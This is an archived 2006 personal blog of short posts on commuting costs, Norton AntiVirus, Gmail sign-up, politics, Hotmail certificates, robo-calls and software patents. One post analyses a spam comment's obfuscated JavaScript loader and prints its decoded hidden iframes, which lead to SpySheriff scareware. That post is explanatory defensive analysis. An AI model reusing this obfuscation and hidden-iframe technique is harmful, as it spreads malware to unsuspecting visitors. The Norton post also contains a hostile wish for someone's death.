Year: 2006

The Cost of a Commute

mike 0 Comment Editorial

Here is a look at what my per-day cost of commuting is.  Since I now take the Google shuttle, I am  interested in how much I save by not driving.

The simple computation rests on the price of gas, which, thankfully, has fallen a bit.  But a more accurate computation would take into account the actual wear and tear on the auto as well.

For me, I drive a car which cost about $25,000, and I expect to use it for about 150,000 miles, and then sell it for about $2,000.  That means on a per mile basis, it costs about $0.15.  Fuel, at $2.45 per gallon and 45mpg, costs a little over $0.05 per mile.  I’m intentionally not accounting for insurance or maintenance, because I do need a car, and even without a commute, I would incur these expenses.  This calculation is merely the cost of driving each day to work.

Well, with a per-mile cost of $0.207, and a round trip of 85 miles, the shuttle saves me $17.66 per trip. 

Norton AntiVirus is the Worst Program Ever

mike 3 Comments Technology

I made the mistake of installing Norton AntiVirus as part of Google Pack.  I guess I thought I would be nice to my new employer and try out the Pack. 

I’ve tried Norton a few times in the past – each time I uninstall it due to being a total system hog.  Once again, I’ve had the same experience.

My laptop is a few years old; its only got 256MB of RAM, but it runs fine.  But today, the first time booting since installing Norton, it took me 15 minutes to regain control of the system (this is not an exaggeration!!  I couldn’t get control of the mouse, the task manager, nothing for 15 minutes!).  Norton just completely monopolizes the disk and CPU.

It’s no wonder viruses spread so easily.  Norton has turned into the same bloatware you’d expect from Adobe or Microsoft, so of course users disable it.  It sucks.  Yes, Norton, we want you to scan for viruses.  But no, this is not permission to completely rape and pillage our hardware and prevent us from getting our work done.

Well, the uninstall of Norton is just about done now, so I’m done with this blog entry.  I hope the numbskull PM at Norton that thought that “well, if users can’t see that it is scanning we won’t get brand recognition” dies a cruel and horrible death.  I’ll be working hard within my company to make sure we get Norton out of the Google Pack.  It just isn’t Googley.

Avoiding Automated Account Creation

mike 0 Comment Technology

For several years, many sites have been using “CAPTCHA“s to ensure there is a real person signing up for an account.  We’ve all seen them – these are the questions where the user is asked to type in the letters of a distorted image before proceeding to the next step.

I just went to create a new GMail account, and I pleasantly discovered a new system, hopefully even more tricky for spammers to work around.  The GMail system requires that it be able to send an SMS message to your cellphone before it will let you create an account.  They will only allow 10 accounts per phone number to sign up.  So, even if the spammer manages to get 100 phones, he’s still not getting a very large number of GMail accounts. 

Of course, if you don’t have a SMS-capable cell-phone, I guess you are out-of-luck!  Maybe others have seem this already and I’m slow to notice.  But I thought this was pretty cool.

Democrats vs Republicans – Lousy Choices

mike 0 Comment Editorial, Politics

The Republicans got trounced yesterday with their “stay the course” policy.  Hooray!  Maybe now we’ll get out of Iraq and bring the troops home.  Everyone except our President knows that the battle is over and the rest of the “job in Iraq” can only be done by Iraqis themselves. 

But, why is it that in order to end the war we have to choose to elect the Democrats?  We’ve successfully kept them out of control in the House since 1995, and for good reason.  Now, don’t get me wrong, if I have to choose between the war in Iraq and electing Democrats, I’ll take the Democrats.  But this is a really awful choice.  Why can’t we keep the Republicans in the House and get out of Iraq?

If you don’t know what I’m talking about, you should read Nancy Pelosi’s e-book.  She clearly states what she is all about:  taxes and social programs.

Here are her 6 tenets  for 2006:

1) Defense.  She wants to double the size of the military with a variety of expensive campaigns.  Well, anything is cheaper than war, I guess.
2) Raise the minimum wage.  (In other words, cause unemployment)
3) College.  Make college tuition tax deductible permanently, cut student loan interest rates, increase Grants, NSF, etc.  (In other words, increase taxes)
4) Energy.  More incentives for energy-efficiency.  (In other words, increase taxes)
5) Affordable Health Care.  Lower prices for seniors.  (Remember the baby boomers?  In other words, increase taxes)
6) Protect Social Security.  Gov’t retirement matching.  Remember the Baby Boomers?  In other words, massively increase taxes.

The stage is definitely set for the democrats.  Bush’s war is going to be the rally cry for Hillary Clinton in 2008.  Taxes… taxes…

I hate to say it, but it’s worth it as long as we get out of Iraq.

I wonder if George Bush realizes that his biggest legacy may not be the war in Iraq, but rather the depression he creates by forcing Americans to elect Democrats to get Bush to stop fighting this stupid war.

Hotmail Trains Users to be Phishing Victims

mike 0 Comment Technology

Since I know a few people at Microsoft on the Hotmail team, I’m hoping one of them will read this article and fix the problem. 

In short, Microsoft and Hotmail are helping internet users get phished due to Hotmail’s poor security practices.

There is a very nice summary of phishing techniques written up here.  One of the major problems they emphasize is how many existing and reputable sites condition users to ignore security.  Security is a tough enough problem to begin with, and the UI in our browsers is clearly deficient.  But on top of that, we’ve got companies like Microsoft not even practicing what they preach, and conditioning users to ignore security warnings.

My example today comes from Hotmail.  I’ve been seeing this problem for several months now, and I’m getting sick of it.  When you go to the hotmail site and try to login, you’ll be presented with the security box (click it to enlarge), indicating to the user that the certificate is invalid.  Unless you are a 100%-pure geek like me, you probably don’t know why it is invalid, or even what it really means.  You know, that in this case, you’ll probably get to read your email if you click OK.  So you ignore the problem.  WARNING – you could have just been phished.  And, when you go to the next site that presents that warning, what will you do?

This problem is very fixable.  Hotmail is in the process of changing the product name from hotmail to live mail, and they are redirecting in a way which exposes this problem.  This is really just laziness – it is a simple problem to fix with matching your domain name and your certificates.

When Microsoft won’t even configure their websites correctly, how can we expect the smaller and more ignorant companies to do so?  You might as well take all the dialog boxes in Internet Explorer and replace them with this (credit to University of Aukland for the image):

Don’t Let Spammers Take Office! (aka – Vote No on Pombo)

mike 1 Comment Editorial, Politics

Q: What do you it when a politician sends spam?
A: Campaigning.

 I don’t have a lot of preference between Jerry McNerney and Richard Pombo.  But after 3 robo-calls from Pombo, he’s not getting my vote.  Further, if I get any robo-calls from other candidates, I’ll vote against them too.  Spammers are spammers whether it is email or phone calls.  If you don’t have the decency to talk to me on the phone, don’t call.  Since Richard Pombo supports this action, I can only conclude that he lacks common decency and does not deserve my vote. 

 I believe automated, unsolicited phone calls are against the law, but I do not have the patience to prove it.  As with most types of spam, the slimy spammers usually figure out a loophole.  Here is a good link if you are curious about automated phone dialing laws.  In the meantime, consider re-signing up for the national do-not-call list.  But I think I’m already on it, and it didn’t help me.

Lastly, vote NO ON Richard “Spamboy” Pombo!!!

Disection of a Spam Comment

mike 0 Comment Technology

I get lots of spam comments on my blog each day.  Most are a similar looking spam with a bunch of links.  I moderate all comments to aviod spam, so none of this ever makes it to the site.  But today I got curious – what is this spam for?  Who sends it?

Manually following the URLs in my browser yields some javascript alerts where they are trying to get me to click “OK”.  Let’s see what happens if you do that.  It’s very interesting!

First off, you get the following script.  This is complicated javascript masking technique.  Let’s look at the code.

   1: <script>
   2: function bNVEXM(inp)
   3:  {
   4:    var k="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh...
   5:    var out="";
   6:    var c1,c2,c3="";
   7:    var e1,e2,e3,e4="";
   8:    var i=0; 
   9:    do { 
  10:      e1=k.indexOf(inp.charAt(i++));
  11:      e2=k.indexOf(inp.charAt(i++));
  12:      e3=k.indexOf(inp.charAt(i++));
  13:      e4=k.indexOf(inp.charAt(i++)); 
  14:      c1=(e1<<2)|(e2>>4);
  15:      c2=((e2&15)<<4)|(e3>>2);
  16:      c3=((e3&3)<<6)|e4;
  17:      out+=String.fromCharCode(c1); 
  18:      if(e3!=64){
  19:        out+=String.fromCharCode(c2)
  20:      };
  21:      if(e4!=64){
  22:        out+=String.fromCharCode(c3);
  23:      } 
  24:    } while(i<inp.length);
  25:    return out; 
  26:  }
  27:   
  28:  function fDVGFV(a1,b1){
  29:    if(!b1){
  30:      return eval(bNVEXM("ZG9jdW1lbnQud3JpdGUo...
  31:    } 
  32:    var i; 
  33:    var o="";
  34:    var k=314; 
  35:    a1=bNVEXM(a1);
  36:    for(i=0;i<a1.length;i++) {
  37:      o+=String.fromCharCode(
              (a1.charCodeAt(i)-32)^
               b1.charCodeAt((i%2)?i%k:Math.abs(k-i-1))%k);
  38:    }
  39:    return o;
  40:  }
  41:   
  42:  fDVGFV('YVxJUVNEUW5BNpiaaV59NWE2Zj4hNCYyNmQqPy8+bmpj...
  43:  </script>

Pretty complicated, huh? Well, it’s not too hard to decipher.  The main of it is line 42, calling a function fDVGFV().  The argument is an encrypted string of javascript code.  At line 30 (when there is only one argument passed in), it will convert the first argument into javascript code, and call eval to run that javascript code.  That intermediate javascript happens to decode into the following single line:

   1:  document.write(fDVGFV(a1,arguments.callee.toString().replace(/s/g,"")));
 

So basically, it just does a minor transform on the input code, and then passes it to be decoded again.  Finally, the loop in lines 36-38 actually convert it to text which can be rendered, and the final HTML output becomes (I added xxx to mangle the URLs):

<IFRAME SRC="http://xxxjoutweb.netxxx/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>
<IFRAME SRC="http://xxxfrlynx.infoxxx/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>

These iframes are what actually loads the final webpages into your browser.  After following through a few additional iframes, both of these will ultimately land you at a javascript dialog pushing SpySheriff (see WikiPedia’s description), a well known malware program.  The product is signed with a valid certificate to HiPoint, Ltd, based out of Panama, issued by Thawte.  If you thought that digital signatures have any meaning with software, you are wrong.  Anyone can sign software, even if it is malware…

I can’t seem to find anyone’s explanation of why SpySheriff exists.  But they employ a lot of code to try to get their junk distributed, and they are very persistent.  All this sophistication in their javascript is to camoflauge the javascript so that spam-detection techniques don’t work.  It’s unfortunate that the javascript “eval” function exists at all – I happen to agree with Eric Lippert on this issue.  Eval is not really necessary, and it creates massive security issues for everyone in addition to helping jerks like SpySherrif circumvent spam detectors.  (See again WikiPedia on the subject)

It’s probably worth noting that this security problem, while commonly blamed on Microsoft’s IE, actually originates in Javascript itself, which was invented by Netscape way back in 1995 or so.  IE just copied it with bug-for-bug compatibility!  (Granted, that was over 10 years ago…)

Friendster now has lawyer-value: Patents

mike 0 Comment Editorial, Lawyers, Technology

GigaOM writes that “Friendster just wrote in to tell us it has been granted a second social networking patent.”  Oh joy.

As I have written before, software patents don’t work.  Soon enough, we’ll see some lawyers talking to Friendster about going after MySpace, Orkut, LinkedIn, Tribe, Tagged, and others for violation of this silly patent.  The money is just too alluring.

Nobody Wins
Let’s say Friendster is right, and that the others are “infringing” (I am making no judgement, but let’s be hypothetical).  Nobody uses Friendster because their service has been miserable.  The service is slow and they just failed to build the right features.  Myspace, Facebook, and even Orkut, have all performed much better and have orders of magnitude more users.  If Friendster were to win a patent-infringement suit, these other companies will either have to pay Friendster hoards of cash (which will just be pocketed by lawyers), or stop offering these features, or both.  In any event – the users of social networking will be the losers – as the products they use will have fewer features and possibly even carry additional fees.  Keep in mind that none of this affected Friendster’s fall – they failed only due to their own poor execution.

Proof of Invalidity
Now, you could say that Friendster pioneered this space and that is why they got the patent.  But this is not true.  The notion of uploading pictures associated to a profile is too obvious and simple.  If you read the patent, you’ll see that covered under this patent would be the notion of uploading a picture to an access-controlled or moderated bulletin board (you have a group of registered users, and there is a “degree of separation” which is enforced via the access control).  Clearly, this was done years ago, and Friendster’s patent is invalid.  The USPO is just not capable of differentiating patent-worthy from bull. 

Sadly, there is a whole army of lawyers that will argue against my example, for they want their own piece of the pie, even if the only way to do it is to steal from those that actually created something useful.

How Times Change

mike 0 Comment Editorial, Lawyers, Technology

FEBRUARY, 1999:  During testimony in federal court, Microsoft presents a video to show how Internet Explorer cannot be removed from Windows 98 without degrading system performance and other negative impacts.  Government attorney David Boies catches a small mistake in the video, and it is discovered that the video is actually spliced from two machines.  Microsoft’s Jim Allchin claims this was an honest mistake, that IE must be bundled into the operating system, and to remove it would hinder innovation. In the end, Microsoft wins the browser war.  (See also: NY Times)

OCTOBER, 2006:  Microsoft ships Internet Explorer 7, the first major release of a browser from Microsoft in several years.  Microsoft is no longer embroiled in competition with Netscape, and instead faces eroding market share by open-source rival Firefox.  Apparently whatever happened in 1999 which made IE so tightly coupled with the OS is now irrelevant, because this browser is no longer has unified navigation with the shell (see here), can easily be installed and uninstalled, and even runs side-by-side with IE6.

I hate to look a gift horse in the mouth, but which one is it?  I guess technology has improved and now Microsoft has the technology to no longer bundle browsers.  Of course, Netscape had this technology in 1993.  On the positive side, IE7 is a huge leap forward, and its great that users can choose to either use IE6, IE7, or Firefox.  Choice is good!